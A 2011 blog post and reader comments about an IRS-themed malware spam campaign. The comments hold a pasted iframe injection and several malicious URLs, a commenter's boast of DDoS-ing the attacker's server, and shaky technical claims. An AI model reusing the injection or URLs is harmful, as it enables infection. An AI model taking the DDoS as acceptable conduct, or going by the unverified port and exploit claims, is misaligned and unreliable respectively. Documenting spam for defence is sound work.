Sponsored by..

Tuesday, 21 June 2011

"Federal Tax transfer rejected" malware

I've never paid taxes to the IRS and I don't intend to now..

From: Jeannette_Case@irs.gov
Date: 21 June 2011 11:16
Subject: Federal Tax transfer rejected

Your federal Tax payment (ID: 632869994691), recently from your checking account was canceled by the your Bank.

Canceled Tax transfer
Tax Transaction ID: 632869994691
Reason of rejection See details in the report below
FederalTax Transaction Report

tax_report_632869994691.pdf.exe (self-extracting
archive, Adobe PDF)

Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD  20785

The spam attempts (and fails) to download malware from uhkusrrthyjshjfd.cz.cc (, Russia) via IRS-REPORTS-WEB-FILE-6856.INFO (parked at Godaddy). In my opinion, all .cz.cc domains are suspect and are worth blocking.

Update 28/9/11: a new version of this email is doing the rounds. This DOES successfully infect vulnerable machines, I will try to find more details.


Unknown said...

I also just received that same email. It too failed to open. SMH!

JonnyF5ve said...

Actually... No it did NOT fail to open... That is the coded response... It makes you THINK nothing happened. It is an IFrame vulnerability that injects payload silently...

JonnyF5ve said...

This ACTUALLY does INSTALL malware. It makes you THINK it does not. It is an IFrame vulnerability to inject a keylogger and backdoor. Usually only targeted certain domains. Also sent out via Yahoo DNS hijack.

Conrad Longmore said...

@JonnyF5ve.. this sample is a few months old. I'm guessing that they've got the exploit working now :)

JonnyF5ve said...

Well... There is a new form that broke out today. That is why I am posting. It does the same thing.. Errors out.. But it DOES inject payload. I captured it within Sandboxie.... So chances are, those who thought it "didn't work" are infected.

Conrad Longmore said...

@JonnyF5ve Thanks.. I amended the post the make it clearer :) Do you have any technical details such as the URL or IPs to block or an infection report.

Charlie Gosh said...

The fact that these creeps continue to deliver these emails just proves that they can't be stopped, or that nobody cares to stop them. This system is seriously broken.

I got mine on Sept. 28 in my spam honeypot at mailinator.com

Envelope info:

Received: from [] (helo=izdawq.mdysoyapaqznhao.ua)
by segment-119-226.sify.net with esmtpa (Exim 4.69)
(envelope-from )
id 1MM0NL-4967tj-QI
for chazman@thisisnotmyrealemail.com; Wed, 28 Sep 2011 20:18:05 +0530
Subject: Your Federal Tax transaction
Date: Wed, 28 Sep 2011 20:18:05 +0530
Message-ID: <4C90A032.3365637@aclighting.com>

The aclighting.com domain has some contact info -- maybe we should give them a call and tell them their domain's being misused. When I've tried this (many times) in the past, the ISP was usually nonchalant and wanted lots of my time and info. That's easier than getting rid of their paying "customer."

Administrative Contact:
AC Entertainment Technologies Ltd.
Justin Newns (justin.newns@ac-et.com)
Fax: +44.01494461024
Centauri House
Hillbottom Road
High Wycombe, BUCKS HP12 4HQ

JonnyF5ve said...

I actually mitigated the issue worldwide. I captured the malware in prograss, and sent in to IC3 and virustotal. VT is what many virus scanning engines pull signatures from. I have discovered the name of the virus:
It is an IFrame poisoning. Lastnight, I set up a CPU+GPU DDoS on the server and took it down.
The ip was this:
Also a Java Poison Driveby programmed with this link:http://l.yimg.com/d/lib/smb/js/hosting/cp/js_source/whv2_001.js

This was the total IFrame injection:
<(i)frame src="http://asdfkjjqervnioqerlsodpo.cx.cc/main.php?page=7c70de013a0acae7">
<(scrippt language="JavaScrippt" src="http://l.yiimg.com/d/lib/smb/js/hosting/cp/js_source/whv2_001.js"><(sccript language="javasccript">geovisit();

I setup DDoS on the initial server.cx.cc and successfully took it down. I confirmed by retrying link in my sandboxie and got no packets after the error, nor any rogue server connections on PORT 20.... THAT IS THE EXPLOIT PORT!

That is all or now... Sniffing out 0-Days, one at a time ;)

Expect us...


Conrad Longmore said...

truruhfhqnviaosdpruejeslsuy.cx.cc is on This is the same doman and IP used for the recent mysql.com hack.

JonnyF5ve said...

What I found strange with this infection was that fact that some Yahoo DNS was being used... I think there may be something larger here that is still going undetected... Maybe DNS poisoning or DNS hijack causing these malwares to be passed in personal email, as well as some enterprise emails.

Random123 said...

Hi Folks,

Just received another variant and thought I should share on this august forum.

From: Beverly_Shepard@irs.gov

Sent: Friday, November 18, 2011 6:19 AM

Subject: Federal Tax transaction canceled

Your Tax payment (ID: 50034430252945), recently initiated from your checking account was returned by the The Electronic Federal Tax Payment System.

Rejected Tax transaction

Tax Transaction ID:

Rejection Reason
See details in the report below

FederalTax Transaction Report
tax_report_50034430252945.pdf (Adobe Acrobat Reader Document)

Free File: I Will Choose A Free File Company
Before you begin...
* Free File companies have their own eligibility criteria, but none offer Free File to taxpayers with an adjusted gross income of more than $58,000.
* Other eligibility criteria may include your: age, state, eligibility for the Earned Income Tax Credit, and military status
* Check the company's website for details because the companies' offers may differ. For example, some companies charge a fee for state tax returns and some may not support a particular form you need to file.
* Remember to begin your Free File return on IRS.gov or you may be charged a fee or asked to buy additional products and services.
* If, after browsing the list of companies, you need help go to Help Me Find a Free File Company.

Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785

The pdf document links to: http://jazapoho.eksoft.tk/

Hope this helps bring it down. I've forwarded it to phishing@irs.gov too.

I inadvertantly did click the link and noticed the suspicious url, and disconnected my computer within 5 seconds of clicking the link. I have an enterprise malware protection system, but please could you help me check if there has been any malware downloaded on my system? Many thanks.

Enrique Von said...

Pufff... In wished I would read all this...., woke up really early and pressed the link... does this malwate affect apple computers?

Conrad Longmore said...

@Enrique Von - I think it impacts Windows only. However, you should make sure that all your Mac software is up-to-date to prevent any future malware threats.

AGC said...

If you've clicked the link in this email, will Norton Antivirus catch this? Or what do you do now?